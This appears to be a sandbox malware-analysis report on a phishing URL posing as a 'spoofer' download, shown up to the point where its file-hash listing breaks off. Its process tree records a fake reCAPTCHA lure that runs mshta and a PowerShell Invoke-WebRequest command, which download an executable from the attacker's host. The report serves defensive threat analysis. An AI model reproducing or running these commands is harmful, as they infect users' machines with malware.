hxxps://heaventools[.]lol/spoofer/download[.]html

Resubmissions

21-11-2024 18:48

241121-xftmfavlgz 10

Analysis

max time kernel
319s
max time network
318s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
21-11-2024 18:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://heaventools.lol/spoofer/download.html

Score

10^/10

discovery execution phishing

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://heaventools.lol/recaptcha-verify

Signatures

Blocklisted process makes network request 11 IoCs

Processes:

mshta.exemshta.exepowershell.exe

flow	pid	process
41	2472	mshta.exe
42	2472	mshta.exe
43	2472	mshta.exe
44	2472	mshta.exe
45	2472	mshta.exe
46	2472	mshta.exe
47	2472	mshta.exe
48	2472	mshta.exe
55	4352	mshta.exe
56	4352	mshta.exe
57	2428	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Powershell Invoke Web Request.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2428 powershell.exe
A potential corporate email address has been identified in the URL: [email protected]
phishing
Drops file in Windows directory 1 IoCs

Processes:

chrome.exe

description ioc process

File opened for modification C:\Windows\SystemTemp chrome.exe
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
2428	powershell.exe

description	ioc	process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133766885106431842"	chrome.exe

Modifies registry class 4 IoCs

Processes:

BackgroundTransferHost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

chrome.exechrome.exepowershell.exe

pid process

1496 chrome.exe
1496 chrome.exe
4088 chrome.exe
4088 chrome.exe
4088 chrome.exe
4088 chrome.exe
2428 powershell.exe
2428 powershell.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

chrome.exe

pid process

1496 chrome.exe
1496 chrome.exe
1496 chrome.exe
1496 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe
Token: SeShutdownPrivilege	1496	chrome.exe
Token: SeCreatePagefilePrivilege	1496	chrome.exe

Suspicious use of FindShellTrayWindow 34 IoCs

Processes:

chrome.exe

pid	process
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe

Suspicious use of SendNotifyMessage 16 IoCs

Processes:

chrome.exe

pid	process
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe
1496	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 1496 wrote to memory of 1104	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 1104	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 3344	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 1200	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 1200	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe
PID 1496 wrote to memory of 4076	1496	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://heaventools.lol/spoofer/download.html
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1496
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb1122cc40,0x7ffb1122cc4c,0x7ffb1122cc58
  2⤵
  PID:1104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1812,i,14589564679536223357,17036460700592582446,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1804 /prefetch:2
  2⤵
  PID:3344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2024,i,14589564679536223357,17036460700592582446,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1896 /prefetch:3
  2⤵
  PID:1200
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2152,i,14589564679536223357,17036460700592582446,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2364 /prefetch:8
  2⤵
  PID:4076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3092,i,14589564679536223357,17036460700592582446,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3112 /prefetch:1
  2⤵
  PID:1120
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3108,i,14589564679536223357,17036460700592582446,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3176 /prefetch:1
  2⤵
  PID:972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4448,i,14589564679536223357,17036460700592582446,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4544 /prefetch:8
  2⤵
  PID:3720
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=740,i,14589564679536223357,17036460700592582446,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4688 /prefetch:1
  2⤵
  PID:4592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4092,i,14589564679536223357,17036460700592582446,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4836 /prefetch:1
  2⤵
  PID:2508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4852,i,14589564679536223357,17036460700592582446,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3188 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4088

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2288

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:3660

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3972

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://heaventools.lol/recaptcha-verify # ✅ ''I am not a robot - reCAPTCHA Verification ID: 1913''
1⤵
- Blocklisted process makes network request
PID:2472

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://heaventools.lol/recaptcha-verify # ✅ ''I am not a robot - reCAPTCHA Verification ID: 1913''
1⤵
- Blocklisted process makes network request
PID:4352
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -Uri 'https://heaventools.lol/recaptcha-verification.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\file986263.exe'"
  2⤵
  PID:3852
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Invoke-WebRequest -Uri 'https://heaventools.lol/recaptcha-verification.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\file986263.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2428

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\210bb9ee3a8c49959975d688f319bf99 /t 3972 /p 4352
1⤵
PID:4648

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199

Filesize
854B

MD5
e935bc5762068caf3e24a2683b1b8a88

SHA1
82b70eb774c0756837fe8d7acbfeec05ecbf5463

SHA256
a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d

SHA512
bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

Filesize
2KB

MD5
d87922585e303ac0169a98bfd1c4721e

SHA1
22de07a55d139168044fc73f9d595303c173c539

SHA256
8807601662dec75f64333c6229a4636ba093c33f6b05a4ae07c5f7b51a5690ce

SHA512
0aff2ee44e73ebc68f99bbec33b85ba92e69489d2dd2cccdc6ed5d93af0d713896f7e78fa510939cde8f142ffa9282224ce59a07d2ddd7c9af5cf0f5ecb8e61a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
56632f0522a1494306c52508f0fa87e9

SHA1
32aa6e20ae2f9babb06fd7d7e9ea4b9298f2718d

SHA256
b39e918f2fc31b9999da7d241f33a09471dc56da9be916875f2459b2cf26fdfb

SHA512
3a99eac60500f9236f12cd1c3117024d767c82f0750901c620745763e7a4cba14506f92e7f50252a00ee3b453647081cc03cb39909fb6a8d104ccf254b0e240e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\285DBFAC55589AA3FB50F0FE690C6535

Filesize
472B

MD5
347e4492473a922fff8825b7275bad0b

SHA1
b39cda50be687992f0dd276322854e64131ea520

SHA256
f49f10312556365db451dedf3a2e26f29ed23c831146c73aca8b5f7454c7c7bd

SHA512
cb15f0bb83b3034dc2f570bd5e909aee16f20f6c6f70aee7085d1cd4058a5c06c143f9ac9c505925d4ec8e7dddfe1dec0a7170304906325ea1bd79f689e445b7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_841DF67C840691A847835C0F760B4DC0

Filesize
471B

MD5
35c40a2fd1a7c48d76c358ae49b15186

SHA1
49c36ff395584b00826fc9090347e34304852b82

SHA256
c60c22d7a5eeb762c87a8f855b3e9eab5c6e746c4f0507ffbbd43d30f64223a3

SHA512
06c835448b061536b4d0148f053c0366712eefb2eb7f7738382101947b6556303ccdd434092b27470939b01494de8395b89121eeb77174fc03816a051935f4c7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

Filesize
1KB

MD5
22c0279173bd88aedc2dc5dbadec6ce0

SHA1
9c466c665ad7bbd90ec14e59c8f5463f9c02b3a7

SHA256
c4f86d7b294966c046226ef60bfed98afd24f30cdc3bb67a396926a5b883e319

SHA512
6f3768e7e7ba6d4259d2ba01b324684186668f3bb831983202795d172df1bf08a32eafb4cd557335eca94991b9b8660c02d8d01ff7e9ad0b5ba5fe56f31af391

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199

Filesize
170B

MD5
bd16c6b06234f7a57aa0472bccb81963

SHA1
2c61386336544f71b3c4d4169b90c8af1f293647

SHA256
3324fc5bd8b7899c87d9345a5779f31530bd0d555a27559afcaa1d557595d4e0

SHA512
f1f19041fd5fccddbd3f700be1472da17172d950737c862db05c2c9fb65acac335a8018fca298e0f91fca7abd5e13d7e8b374959d3409bda079e09845fe5f447

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

Filesize
488B

MD5
dcbe1c9085b1712faa028799e616c567

SHA1
fd86f1c044716ed26d013ba5b3633331682199c3

SHA256
498686afc753dbee8ed65d63e4e5d6f42c929bb9e842d0393a7e52bade6b28df

SHA512
52de91c8367e9fdbcea2f95e787a9b50972f2ca5e9650870b21d4281f6b8a16b6b635ae84304d1f77577ea22411cd9d608c68ae318bf3e56fbc456535d4f3fc8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
e51c09e7c62d9a96c754ea113107edea

SHA1
4a1b99b00bc194084cf50a6dcc3023ff19db77e8

SHA256
f0e56ed9df1b6aae6a16f8e0c38fd49b5da245296e7a8f36cb241fffdb1fe89b

SHA512
6b879a0a5481dd3609d7096443ebfeebd99e4d44528d68ca9c2d355665d278d5135b25b50013983d7d84311ed569ff4a031606d797de12ec069e3498a86b66c3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\285DBFAC55589AA3FB50F0FE690C6535

Filesize
480B

MD5
24c9f724b63d41e3f249564f680112b3

SHA1
70d2d4908a3d1c65a0e7f4442dccfcad0c5a0503

SHA256
2cdfcfbd955ea74f514e22fdb175a39eb8f3d5c82909425bb40569a991c0718e

SHA512
64192550dac19782e1aef6dc76730d8a3ddc725f3f27d1faed02be70e0258037c43fce0d5456aa9110780748f36e3398ea53bed68905e3aff3a261d68d99cb32

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_841DF67C840691A847835C0F760B4DC0

Filesize
402B

MD5
e53e50268dede79383c155c284149e18

SHA1
34f2c8acfd179a8f7093c27a9c99ff5dab2428c5

SHA256
ebbba1c1215627df50e01c7f2cf6cd085bba9dbbca13bc9b7bf753cc80096ff0

SHA512
b409c7af698ddd33a8ed22f92de8b52b555f40a2daaa5146f85f163378299ad63a861cc6349b1225797e758e78e91f59df21f530d014350efe96e6fd1b7da704

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

Filesize
482B

MD5
d432dc5902e8fb3aaedea12329b1cd7e

SHA1
3b673351b0876923dc6fe26a177c02a65a5cbf8b

SHA256
20b4a121346ef4d5f7c1fd60a924f28805c527c3c8d29203b3f6d98bd5d73064

SHA512
ff1b295909f2cb6b6f30da41f1a757515d5694a2c1fb7e195b5763e7cd9e86db10d24cfe278eeaeed7b74719571181f92ffa3ef1207e9cb5837ae42d9c9b3699

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
b5ad5caaaee00cb8cf445427975ae66c

SHA1
dcde6527290a326e048f9c3a85280d3fa71e1e22

SHA256
b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8

SHA512
92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
1008B

MD5
d222b77a61527f2c177b0869e7babc24

SHA1
3f23acb984307a4aeba41ebbb70439c97ad1f268

SHA256
80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747

SHA512
d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\58251347-6870-410c-9f7f-9186c6060704.tmp

Filesize
9KB

MD5
8bf90d191b81b8596fc7989623a84086

SHA1
